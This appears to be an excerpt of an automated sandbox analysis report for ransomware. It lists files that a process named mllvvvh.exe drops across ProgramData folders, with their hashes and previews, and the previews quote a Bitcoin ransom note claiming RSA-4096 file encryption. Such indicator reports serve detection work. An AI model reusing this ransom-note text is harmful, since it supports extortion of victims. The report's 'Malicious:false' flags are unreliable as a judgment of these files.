                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Network\Downloader\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Network\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Network\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Network\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\OFFICE\Heartbeat\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\OFFICE\Heartbeat\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\OFFICE\Heartbeat\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\OFFICE\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\OFFICE\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\OFFICE\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\CellularUx\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\CellularUx\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\CellularUx\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
